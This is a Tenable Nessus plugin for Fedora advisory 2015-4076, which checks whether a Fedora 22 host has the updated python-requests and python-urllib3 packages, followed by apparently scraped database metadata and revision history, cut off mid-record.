ID FEDORA_2015-4076.NASL Type nessus Reporter This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-11-02T00:00:00
Description
Backport of patch to not ascribe cookies to the target domain.
https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b
2f688785a669b9aafc
http://www.openwall.com/lists/oss-security/2015/03/14/4
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2015-4076.
#
include("compat.inc");
if (description)
{
script_id(81992);
script_version("1.3");
script_cvs_date("Date: 2018/11/20 11:04:17");
script_xref(name:"FEDORA", value:"2015-4076");
script_name(english:"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)");
script_summary(english:"Checks rpm output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Backport of patch to not ascribe cookies to the target domain.
https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b
2f688785a669b9aafc
http://www.openwall.com/lists/oss-security/2015/03/14/4
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
# http://www.openwall.com/lists/oss-security/2015/03/14/4
script_set_attribute(
attribute:"see_also",
value:"https://www.openwall.com/lists/oss-security/2015/03/14/4"
);
# https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?c5411e74"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?78642937"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?549f4977"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected python-requests and / or python-urllib3 packages."
);
script_set_attribute(attribute:"risk_factor", value:"High");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:python-requests");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:python-urllib3");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22");
script_set_attribute(attribute:"patch_publication_date", value:"2015/03/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/23");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC22", reference:"python-requests-2.5.3-2.fc22")) flag++;
if (rpm_check(release:"FC22", reference:"python-urllib3-1.10.2-1.fc22")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "python-requests / python-urllib3");
}
{"id": "FEDORA_2015-4076.NASL", "bulletinFamily": "scanner", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2015-03-23T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/81992", "reporter": "This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977", "https://www.openwall.com/lists/oss-security/2015/03/14/4"], "cvelist": [], "type": "nessus", "lastseen": "2019-11-01T02:27:22", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-requests", "cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:python-urllib3"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-10-28T20:11:44", "references": [{"idList": ["UBUNTU_USN-136-2.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/SSL_VERSION"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:11:44", "value": -0.4, "vector": "NONE"}}, "hash": "d7cedc0aa5d2421720294f49838d3d60bdfab2f6553e713485505cd0aa2ff7b5", "hashmap": [{"hash": "a70e0ff4a50d0fc1a7d437706c738959", "key": "title"}, {"hash": "0c55f6f2d91bfca6a2d650fcae122dc4", "key": "reporter"}, {"hash": "06353cb7b12cf5618018a61e4425d3fa", "key": "description"}, {"hash": "79c62a75cfec1baa9e8b613cac109f60", "key": "pluginID"}, {"hash": "e7cef654fa5a2dc8dc1cf9ea9eae2701", "key": "href"}, {"hash": "7d99420e0ea935c1fc7c24107c83a5a4", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "83f8b101d65be54c0c1492f7fd1a515c", "key": "references"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "b2e160618f9f4eada932a078e2d09464", "key": "sourceData"}, {"hash": "13d278b957bff02a92f3a8dc1e179309", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/81992", "id": "FEDORA_2015-4076.NASL", "lastseen": "2019-10-28T20:11:44", "modified": "2019-10-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "81992", "published": "2015-03-23T00:00:00", "references": ["http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977", "https://www.openwall.com/lists/oss-security/2015/03/14/4"], "reporter": "This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.openwall.com/lists/oss-security/2015/03/14/4\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified"], "edition": 6, "lastseen": "2019-10-28T20:11:44"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-requests", "cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:python-urllib3"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b 2f688785a669b9aafc http://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "41f876735a790c861660366eb3722dcea93d2dac9a946e8f82f126bcc2803eff", "hashmap": [{"hash": "a70e0ff4a50d0fc1a7d437706c738959", "key": "title"}, {"hash": "3b43a7bf92243b1138346ddc556544ae", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c27e4f4ee5a80216649419e531dde975", "key": "references"}, {"hash": "79c62a75cfec1baa9e8b613cac109f60", "key": "pluginID"}, {"hash": "7d99420e0ea935c1fc7c24107c83a5a4", "key": "cpe"}, {"hash": "260daf16ace2fef4f8113b9361f1de2f", "key": "sourceData"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d6be003d09a291b4c01a5f38ea0edeb3", "key": "href"}, {"hash": "13d278b957bff02a92f3a8dc1e179309", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81992", "id": "FEDORA_2015-4076.NASL", "lastseen": "2017-10-29T13:46:00", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "81992", "published": "2015-03-23T00:00:00", "references": ["http://www.openwall.com/lists/oss-security/2015/03/14/4", "http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:46:00"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-requests", "cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:python-urllib3"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:21:04", "references": []}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "0fe7326ac4e55e25daca1ef9356c1ba0d5441daca6455b2c69177b3e6c037691", "hashmap": [{"hash": "a70e0ff4a50d0fc1a7d437706c738959", "key": "title"}, {"hash": "06353cb7b12cf5618018a61e4425d3fa", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e145933baf60ff34e77ad35c77d74478", "key": "modified"}, {"hash": "79c62a75cfec1baa9e8b613cac109f60", "key": "pluginID"}, {"hash": "7d99420e0ea935c1fc7c24107c83a5a4", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "83f8b101d65be54c0c1492f7fd1a515c", "key": "references"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d6be003d09a291b4c01a5f38ea0edeb3", "key": "href"}, {"hash": "b2e160618f9f4eada932a078e2d09464", "key": "sourceData"}, {"hash": "13d278b957bff02a92f3a8dc1e179309", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81992", "id": "FEDORA_2015-4076.NASL", "lastseen": "2019-01-16T20:21:04", "modified": "2018-11-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "81992", "published": "2015-03-23T00:00:00", "references": ["http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977", "https://www.openwall.com/lists/oss-security/2015/03/14/4"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.openwall.com/lists/oss-security/2015/03/14/4\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:21:04"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-requests", "cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:python-urllib3"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b 2f688785a669b9aafc http://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-02-21T01:23:43", "references": []}, "score": {"modified": "2019-02-21T01:23:43", "value": 0.0, "vector": "NONE"}}, "hash": "b4cb2a5ec56a1b57d8e758faae253674f162d580e74e875206e0e080f5cf5f9f", "hashmap": [{"hash": "a70e0ff4a50d0fc1a7d437706c738959", "key": "title"}, {"hash": "3b43a7bf92243b1138346ddc556544ae", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e145933baf60ff34e77ad35c77d74478", "key": "modified"}, {"hash": "79c62a75cfec1baa9e8b613cac109f60", "key": "pluginID"}, {"hash": "7d99420e0ea935c1fc7c24107c83a5a4", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "83f8b101d65be54c0c1492f7fd1a515c", "key": "references"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d6be003d09a291b4c01a5f38ea0edeb3", "key": "href"}, {"hash": "b2e160618f9f4eada932a078e2d09464", "key": "sourceData"}, {"hash": "13d278b957bff02a92f3a8dc1e179309", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81992", "id": "FEDORA_2015-4076.NASL", "lastseen": "2019-02-21T01:23:43", "modified": "2018-11-20T00:00:00", "naslFamily": 